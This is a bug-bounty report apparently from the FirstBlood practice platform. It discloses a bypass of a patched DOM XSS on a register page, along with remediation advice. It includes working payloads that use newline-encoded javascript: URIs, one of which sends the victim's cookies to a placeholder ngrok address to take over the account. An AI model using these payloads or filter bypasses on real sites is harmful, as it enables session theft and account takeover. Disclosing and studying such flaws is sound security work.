FirstBlood-#617[COLLAB] DOM XSS on register patch bypass
This issue was discovered on FirstBlood v2.0.0 (issues patched)



On 2021-10-26, amec0e Level 3 reported:

Hey mate,

Using a previous report for a DOM XSS on the endpoint register.php via the parameter ref=. Playing with this I was able to find a bypass for the current patch, using newline encodings we can achieve XSS. DUe to the lack of HttpOnly flag on drps cookies we can leak this token for a full ATO.

Impact:

Due to the lack of httponly on the drps cookie it is entirely possible using the payload below to steal a drps cookie when they click "Return to previous page" on the regiser.php endpoint with the ref parameter.

jav%0Aascr%0Aipt:window.location.href=`YOURNGROKADDRESS/${document.cookie}`

Steps to Reproduce:

(Doctor NOT logged in)

  • Visit the endpoint register.php
  • Append the following payload to the URL and press "Enter"
?ref=jav%0Aascr%0Aipt:confirm(document.domain);
  • Now click "Return to previous page" and observe the payload triggering.

(Logged in as Doctor)

  • Visit the endpoint register.php
  • Start your Ngrok server.
  • Append the following payload to the URL and press "Enter"
?ref=jav%0Aascr%0Aipt:window.location.href=`YOURNGROKADDRESS/${document.cookie}`
  • Now click "Return to previous page" and observe the cookie has been sent to our ngrok server.

Remeditation:

Set the flag HttpOnly on the doctors cookies and disallow for javascript URI redirections.

(Please do verify these remediation steps to ensure they are accurate)

Best regards,

Amec0e.

In Collaboration with thebinarybot

P3 Medium

Endpoint: register.php

Parameter: ?ref=

Payload: NA


FirstBlood ID: 32
Vulnerability Type: Reflective XSS

The parameter ?ref on register.php was poorly fixed and can be bypassed in various ways. Firstly the developer failed to use strtolower() when comparing strings, and the use of characters such as %09 will also bypass the filter.